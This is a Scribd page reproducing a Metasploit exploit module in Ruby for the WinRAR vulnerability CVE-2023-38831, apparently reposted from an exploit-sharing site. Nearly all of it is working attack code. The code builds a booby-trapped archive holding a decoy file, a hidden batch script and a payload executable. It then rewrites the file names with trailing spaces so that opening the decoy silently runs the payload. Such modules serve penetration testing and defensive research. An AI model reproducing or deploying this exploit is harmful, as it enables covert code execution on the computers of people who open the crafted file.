Scribd
Upload
70 views2 pages

Winrar Exploit

This module exploits a vulnerability in WinRAR (CVE-2023-38831) that allows for code execution when a user opens a crafted RAR file containing an embedded document. It generates a RAR file containing a decoy document, batch script, and payload executable. The batch script launches the payload and decoy to exploit the vulnerability and execute code on vulnerable systems.

Uploaded by

tier2me
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
70 views2 pages

Winrar Exploit

This module exploits a vulnerability in WinRAR (CVE-2023-38831) that allows for code execution when a user opens a crafted RAR file containing an embedded document. It generates a RAR file containing a decoy document, batch script, and payload executable. The batch script launches the payload and decoy to exploit the vulnerability and execute code on vulnerable systems.

Uploaded by

tier2me
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

##

# This module requires Metasploit: https://metasploit.com/download


# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zip'

class MetasploitModule < Msf::Exploit::Remote


Rank = ExcellentRanking

include Msf::Exploit::FILEFORMAT
include Msf::Exploit::EXE

def initialize(info = {})


super(
update_info(
info,
'Name' => 'WinRAR CVE-2023-38831 Exploit',
'Description' => %q{
This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a
user opens a crafted RAR file and its
embedded document, the decoy document is executed, leading to code
execution.
},
'License' => MSF_LICENSE,
'Author' => ['Alexander "xaitax" Hagenah'],
'References' => [
['CVE', '2023-38831'],
['URL', 'https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/'],
['URL', 'https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/']
],
'Platform' => ['win'],
'Arch' => [ ARCH_X64, ARCH_X86 ],
'Targets' => [['Windows', {}]],
'Payload' => {
'DisableNops' => true
},
'DisclosureDate' => '2023-08-23',
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

register_options([
OptString.new('OUTPUT_FILE', [true, 'The output filename.', 'poc.rar']),
OptPath.new('INPUT_FILE', [true, 'Path to the decoy file (PDF, JPG, PNG,
etc.).'])
])

register_advanced_options([
OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload
executable.', nil])
])
end
def exploit
Dir.mktmpdir do |temp_dir|
output_rar = File.join(Msf::Config.local_directory, datastore['OUTPUT_FILE'])
input_file = datastore['INPUT_FILE']
decoy_name = File.basename(input_file)
decoy_ext = ".#{File.extname(input_file)[1..]}"
payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(8) +
'.exe'

decoy_dir = File.join(temp_dir, "#{decoy_name}A")


Dir.mkdir(decoy_dir)

payload_path = File.join(decoy_dir, payload_name)


File.open(payload_path, 'wb') { |file| file.write(generate_payload_exe) }

bat_script = <<~BAT
@echo off
start "" "%~dp0#{payload_name}"
start "" "%~dp0#{decoy_name}"
BAT

bat_path = File.join(decoy_dir, "#{decoy_name}A.cmd")


File.write(bat_path, bat_script)

FileUtils.cp(input_file, File.join(temp_dir, "#{decoy_name}B"))

zip_path = File.join(temp_dir, 'template.zip')


Zip::File.open(zip_path, Zip::File::CREATE) do |zipfile|
zipfile.add("#{decoy_name}B", File.join(temp_dir, "#{decoy_name}B"))
zipfile.add("#{decoy_name}A/#{decoy_name}A.cmd", bat_path)
zipfile.add("#{decoy_name}A/#{payload_name}", payload_path)
end

content = File.binread(zip_path)
content.gsub!(decoy_ext + 'A', decoy_ext + ' ')
content.gsub!(decoy_ext + 'B', decoy_ext + ' ')

File.binwrite(output_rar, content)

print_good("Created #{output_rar}")
end
end

end

# 0day.today [2023-11-09] #

You might also like